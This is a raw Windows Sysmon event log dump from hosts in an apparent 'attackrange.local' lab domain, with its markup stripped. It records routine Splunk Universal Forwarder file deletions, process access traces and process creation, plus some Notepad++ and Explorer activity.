AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104121Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.717{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1413FA0A712B5BD9EC70EE9DF36FBD52,SHA256=23F636E6620EB91EB078298CFBC9C4B08FF75EFB2372C43146BA75190F2575C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082006Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:03.375{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B019464B4498CB08874E96B9A71323F,SHA256=9506E5A21B35C127DAE4CE471EB5D1DE595D42C2E8D636DA25686FF3448BB09C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104120Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.358{58E9C193-B31B-615A-E601-00000000FC01}63041348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000104119Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:01.284{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49578-false10.0.1.12-8000- 23542300x8000000000000000104118Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.201{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56285EA878C3DFCF48726EB585358D9C,SHA256=A4A6430D2E003F6EF1FAF4C59C9B7B1DC97EDE632C53054B3735EF89B43A7CBB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104117Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.186{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B31B-615A-E601-00000000FC01}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104116Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.186{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104115Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.186{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104114Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.186{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104113Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.186{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104112Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.186{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B31B-615A-E601-00000000FC01}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104111Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.186{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B31B-615A-E601-00000000FC01}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104110Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.187{58E9C193-B31B-615A-E601-00000000FC01}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104136Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:04.905{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=40E180DE42A5E6DD822480F43A84F410,SHA256=68E02BD28E0CC5C0E2B4571F8A5798327DFFE97CAC8FC5BFFEECB13E519ACA89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104135Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:04.733{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A2BFDB07F72B28BE61E8AF63D9C08A3,SHA256=C124B03504BE473A03D62B4705A473E64C00BD11DD5470EE7624A0906C2B4A04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082007Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:04.500{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4703E70E97F107BD331BF56421AA674E,SHA256=DF97C0819C7555CA7A6C91A543209D6495A4B5201AE43226E1D47D167E9C686A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104134Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:04.623{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\new 2@2021-10-04_075343MD5=154759EC8C5C4B75C290C08B845EA6BD,SHA256=CCD7EA27A75603C053C5639803F1863FA225814E0B042DDA63725EAE3362DCF9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104133Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:04.076{58E9C193-B31B-615A-E701-00000000FC01}25642556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104132Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:04.061{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104131Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:04.061{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104130Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:04.061{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104145Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:05.748{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25EBCD73F7455A0F4212ED26AD5FD4F7,SHA256=3BCF23DAFA8293B3EDD6E44AEA6ABC5719990D432129C154BB0476210AB0E75D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082008Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:05.500{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7540D88482451062DDA30FC06C2CB1E1,SHA256=AA5E0EA0079D40E3CB35A2896784F8239F0FFDCD4F3A0D6A45CDD90F427F96C8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104144Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:05.342{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B31D-615A-E801-00000000FC01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104143Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:05.342{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104142Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:05.342{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104141Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:05.342{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104140Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:05.342{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104139Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:05.342{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B31D-615A-E801-00000000FC01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104138Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:05.342{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B31D-615A-E801-00000000FC01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104137Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:05.343{58E9C193-B31D-615A-E801-00000000FC01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104147Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:06.748{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=143CAA2A9B1639540AEB079D4CE5E446,SHA256=962E97DC6272C6FE18B8BDF687A3555AA58844E89837C9D58D1A92004A19A35B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082010Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:06.546{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A16F3C2A2E2A5A7927CC75B621FAFD0,SHA256=EC9F006474F011D832534C8D62805318D6CB63397318388AA399CD57A397A664,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104146Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:06.373{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05F815FA7795D552676EBBB1556AF9C1,SHA256=64C4F8BCDCA64E687631CEFF1A86EED62AC5AF3BC644BF95B83362848C810F68,IMPHASH=00000000000000000000000000000000falsetrue 